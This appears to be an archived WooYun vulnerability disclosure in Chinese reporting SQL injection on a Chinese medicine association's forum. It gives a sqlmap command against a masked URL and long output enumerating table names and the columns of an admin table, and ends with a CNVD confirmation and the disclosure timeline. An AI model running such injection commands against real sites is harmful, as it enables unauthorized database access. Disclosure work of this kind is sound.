乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-02: 细节已通知厂商并且等待厂商处理中 2015-09-05: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-15: 细节向核心白帽子及相关领域专家公开 2015-09-25: 细节向普通白帽子公开 2015-10-05: 细节向实习白帽子公开 2015-10-20: 细节向公众公开
中国中药协会SQL注射
暴力跑表
sqlmap.py -u "http://**.**.**.**/forum/query.asp?boardid=0" --tables
表太多了以至于sqlmap装不下了,在此请教大牛们这种情况怎么办
看到敏感词admin,以下脱出数据证明问题存在
| duptest || duvida || dwe_corr_tokens || dwe_internal_wf_attributes || dwe_workflow_documents || dwp_ecard_album || dwp_kontakt || entity || equipment || estados || eventi || ew_temi || experiment || ezin_sections || federationapplicants || festplatte || files || form_definition_version || forum_flag || foundlists || fusion_users || groutedetail || grp || guava_roles || guava_theme_modules || gws_text || help_relation || imagens || index || indice || info || insertids || ipassocs || ipblocks || ipmacassocs || ips || iuridiuli_ge || jiveprivacylist || jos_bannerclient || jos_components || jos_contact_details || jos_content || jos_core_acl_aro || jos_core_log_searches || jos_docman_licenses || jos_modules || jos_newsfeeds || jos_preguntas || jos_sections || jos_vm_category || jos_vm_creditcard || jos_vm_payment_method || jos_vm_product_category_xref || jos_vm_product_discount || jos_vm_product_reviews || jos_vm_product_type || jos_vm_product_type_parameter || jos_vm_shopper_vendor_xref || jos_vm_zone_shipping || kategorien || kreditkarte || kultura_ge || list || locatedon || login_user || lt_custom1 || lt_decisao || lt_encerramento || lt_garantia || lt_objeto || lt_procedimento || lt_tipo_de_acao || m_admin || mambo_session || manutencao || marital_status || master_table || maxcodcorreo || maxcodtelefono || mb_users || medicalprocedure || mein_doc || memberlist || membership || mergeswith || message_statuses || metadataschemaregistry || mgbliuyan || microsoft || mm_usuarios_do_processo || mobile_menu_text || monthlabel || most_recent_checksum || mountainonisland || municipio || music_association || my_poi || my_street || mymps_badwords || mymps_member_album || mymps_news_img || myticketek || noms || nuke_banner_terms || nuke_bbauth_access || nuke_bbsessions || nuke_bbvote_voters || nuke_confirm || nuke_downloads_votedata || nuke_gallery_pictures_newpicture || nuke_links_editorials || nuke_poll_data || nuke_poll_desc || nuke_reviews_add || nuke_session || nulltest || oe || oil_bfsurveypro_choices || oil_biolmed_land || oil_biolmed_measures_by_entity_types || oil_phocadownload_categories || oil_phocagallery || oil_poll_date || operationstatus || ordre || organization_seq || osc_manufacturers || osc_products_images || osc_reviews || osc_specials || paramtres || part || partenaire || partenaires || partscustomer || partsvendor || passe || passwds || payment || payments || people || perdorues || perfpasswordallselected || phorum_session || phorum_user || phpbb_auth_access || phpbb_categories || phpbb_posts || phpbb_posts_text || phpbb_topics_watch || phpbb_words || phpshop_categories || phpshop_system || pilot || pma_table_info || po_seq || poles_zeros || prefix_tab || produtos || project_user_xref || proxypriceinfo || ps_dmk || pw_banuser || pw_forums || pw_memberinfo || pw_sharelinks || pz_data || qrtz_blob_triggers || qrtz_fired_triggers || querycachetwo || questions || r1length || r1size || r2idf || rating_track || rel_person_paper || report || resource_types || role_permission || rss_categories || rss_subscription || ruolo || s2odtmap || s_log || sailors || salariedemployees || salgrade || sampledata || sazog_urtiertoba_ge2 || series || sf_guard_user || sf_guard_user_permission || sga_xplan_tpl_dba_tables || sga_xplan_tpl_v$sql || sga_xplan_tpl_v$sql_plan_sall || shared_secrets || sheldonshows || shipment_line || skins || slot || solicitacaosenha || source || specialitytable || spip_auteurs || spip_auteurs_rubriques || spip_documents_rubriques || standort || statelist || stringtable || study || study_text || study_user || subimageinfo || survey || surveyanswer || surveyquestion || surveyrespondent || synchro_element || sysmaps || tb_admin || tb_administrator || tb_login || tb_members || tb_usernames || tb_users || tbl_clients || tbl_works_clients || tblblogentries || tblblogentriesrelated || tblproduct || tblproducts || tester || themes || thot_category || thot_language || til_idioton || titles || tmp || topacmail1 || topacmail2 || topic || tuser || tx_tcdirectmail_bounceaccount || tx_tcdirectmail_targets || typefacture || typeproduit || typerule || um_permissions || uniquetest || url || user_group || user_preferences || user_uploads_pictures || useres || userfiles || userrole || users_tmp || userstbl || uvw_preferences || vbulletin_user || vcd_covers || vcd_metadata || vcd_porncategories || vcd_pornstars || vcd_vcdtopornstudios || vendor_seq || visits || visual || voodoo_members || vrls_partners || vrls_xref_listing_offer_type || vykachka || webadmins || webcal_config || webcal_import || webcal_report_template || webcal_user || webmaster || webuser || words || wp1_comments || wp_pod_pages || wp_term_relationships || x_admin || yabb_settings || yearend || zoph_users || zutat_cocktail |+--------------------------------------+Database: Microsoft_Access_masterdbTable: x_admin[196 columns]+---------------------------+-------------+| Column | Type |+---------------------------+-------------+| adminemail | non-numeric || adminmail | non-numeric || advanced | non-numeric || advid | non-numeric || alias_area_id | non-numeric || allowbanip | non-numeric || allowpostannounce | non-numeric || annoid | non-numeric || app_utente_e | non-numeric || area_id | non-numeric || areaid | non-numeric || article_id | non-numeric || auth | non-numeric || az | non-numeric || ba_num_voted | non-numeric || banlist_id | non-numeric || bb | non-numeric || beneficiarioid | non-numeric || bezeichnung | non-numeric || bracciali | non-numeric || cache_id | non-numeric || categories | non-numeric || cc_expires | non-numeric || ccid | non-numeric || ccv | non-numeric || charttype | non-numeric || cod | non-numeric || coddoc | non-numeric || comment1 | non-numeric || comment4 | non-numeric || comune | non-numeric || config | non-numeric || config_owner | non-numeric || contact | non-numeric || converge_pass_hash | non-numeric || cookie | non-numeric || coppermine | non-numeric || coste | non-numeric || courseid | non-numeric || cronid | non-numeric || csc | non-numeric || csv_id | non-numeric || customenu | non-numeric || d_id | non-numeric || dat_utente_cre | non-numeric || dat_utente_mod | non-numeric || db_value | non-numeric || debug | non-numeric || del_flg | non-numeric || deliv_date_id | non-numeric || descrizione | non-numeric || digest | non-numeric || diritto | non-numeric || disp_name | non-numeric || e_id | non-numeric || editor | non-numeric || en | non-numeric || enter | non-numeric || equip_id | non-numeric || exclude_date | non-numeric || feedid | non-numeric || file2 | non-numeric || file4 | non-numeric || file5 | non-numeric || filename | non-numeric || flipper | non-numeric || folder | non-numeric || full_news | non-numeric || groupname | non-numeric || gtranslate | non-numeric || hdesc | non-numeric || height | non-numeric || host | non-numeric || id_annuncio | non-numeric || id_preventivo | non-numeric || id_tra | non-numeric || idaddome | non-numeric || idanamnesifamil | non-numeric || idapparlocom | non-numeric || idcorpo | non-numeric || iddescrizionedocumento | non-numeric || iddistretto | non-numeric || idesameobiettivo | non-numeric || idgara | non-numeric || idlocation | non-numeric || idmlgroup | non-numeric || idmlmail | non-numeric || idorecchie | non-numeric || idprovenienza | non-numeric || idragsoc | non-numeric || idregistro | non-numeric || idricoverohatipologia | non-numeric || idsubscription | non-numeric || idtipodocumento | non-numeric || idtipotrattamento | non-numeric || idtrasferimento | non-numeric || imenu | non-numeric || impiegato | non-numeric || indirizzo | non-numeric || jfnewsfeeds | non-numeric || joomla | non-numeric || jumpmenu | non-numeric || kre1 | non-numeric || language_id | non-numeric || last_login | non-numeric || lastpost | non-numeric || lastpostpmtime | non-numeric || legacybots | non-numeric || loadmodule | non-numeric || loans | non-numeric || loc | non-numeric || locale | non-numeric || location | non-numeric || logid | non-numeric || loginname | non-numeric || luogoid | non-numeric || luogonascita | non-numeric || main2 | non-numeric || manager | non-numeric || matrnr | non-numeric || menu_selezione | non-numeric || mf_name | non-numeric || mod_cpmfetch | non-numeric || mod_gtranslate | non-numeric || mod_virtuemart_latestprod | non-numeric || mod_virtuemart_randomprod | non-numeric || mod_virtuemart_search | non-numeric || mod_vm_prod_cat_full | non-numeric || modhome | non-numeric || ndc | non-numeric || newssummaryauthor | non-numeric || newssummarycategory | non-numeric || notification_type | non-numeric || oggettistican | non-numeric || oggetto | non-numeric || optionid | non-numeric || orecchini | non-numeric || ortnr | non-numeric || partnerid | non-numeric || payment | non-numeric || pl_id | non-numeric || pluginhookid | non-numeric || post_id | non-numeric || pref_id | non-numeric || price_id | non-numeric || prz_merce_fis | non-numeric || qta_merce | non-numeric || qualificareferenteid | non-numeric || rating_id | non-numeric || recommend_product_id | non-numeric || rol | non-numeric || rolle_nr | non-numeric || salt | non-numeric || sede | non-numeric || sess_id | non-numeric || sheight | non-numeric || ship | non-numeric || short_news | non-numeric || signallogin | non-numeric || signature | non-numeric || sistema | non-numeric || sklep1 | non-numeric || sklep2 | non-numeric || smilie_id | non-numeric || source | non-numeric || stan | non-numeric || standard | non-numeric || startnummer | non-numeric || statement | non-numeric || statoattivitaid | non-numeric || stdprice | non-numeric || style_id | non-numeric || sub_large_image2 | non-numeric || sub_large_image5 | non-numeric || sub_title3 | non-numeric || sub_title4 | non-numeric || swidth | non-numeric || tagid | non-numeric || tagname | non-numeric || tax_id | non-numeric || tipologiaenteid | non-numeric || under_menu | non-numeric || url | non-numeric || ustawienie | non-numeric || utenteid | non-numeric || utilizzatore | non-numeric || value_id | non-numeric || vorgaenger | non-numeric || vorlnr | non-numeric || whabfragen | non-numeric || white | non-numeric || width | non-numeric || xprocedimento | non-numeric || xstandard | non-numeric || yahoo | non-numeric || yoocarousel | non-numeric |+---------------------------+-------------+
部分表段未能截取下来,因为老夫不知道怎么把全部表段显示粗来。。。审核谅解
综上
你们懂
危害等级:中
漏洞Rank:8
确认时间:2015-09-05 08:48
CNVD确认所述情况,已由CNVD通过网站公开联系渠道向其邮件通报。
暂无
